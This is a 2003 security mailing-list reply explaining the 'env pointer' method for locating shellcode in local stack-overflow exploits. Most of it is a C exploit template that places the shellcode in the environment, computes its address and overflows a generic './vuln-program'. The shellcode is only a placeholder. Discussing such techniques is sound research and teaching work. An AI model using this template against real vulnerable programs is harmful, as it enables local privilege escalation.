Re: Automatic discovery of shellcode address

From: Marco Ivaldi <raptor(at)0xdeadbeef.info>
Date: Mon Mar 24 2003 - 19:38:50 EST


On Mon, 24 Mar 2003 steve@uk.intasys.com wrote:

> That wasn't the part that I was considering as being novel.

If you are exploiting a local vulnerability, you can also use the even simpler env pointer technique to locate the shellcode.

#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Not defined in the post; the values below are placeholders so the snippet compiles. */
#define BUF   512        /* size of the argument buffer handed to the vulnerable program */
#define ALIGN 0          /* byte offset into buf at which the 4-byte return addresses start */

static char sc[] = "SHELLCODE_PLACEHOLDER";   /* shellcode bytes, omitted in the post */

int main()
{
	char *env[2] = {sc, NULL};   /* the shellcode is the only environment string */
	char buf[BUF];
	int i;

	int *ap = (int *)(buf + ALIGN);
	/* With a single env string, it sits just below the program name at the top of
	   the stack (0xbffffffa on 32-bit Linux without stack randomisation). */
	int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program");

	/* fill buf with the computed address, then NUL-terminate the string */
	for (i = 0; i < BUF - 1; i += 4)
		*ap++ = ret;
	*ap = 0x0;

	execle("./vuln-program", "vuln-program", buf, NULL, env);
	return 0;
}

As you can see, for ./vuln-program the shellcode will always be at:

0xbffffffa - strlen(sc) - strlen("./vuln-program")

Cheers,

:raptor

Antifork Research, Inc.                 0xdeadbeef | raptor's labs
http://www.antifork.org
http://www.0xdeadbeef.info
Received on Mon Mar 24 23:38:32 2003
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT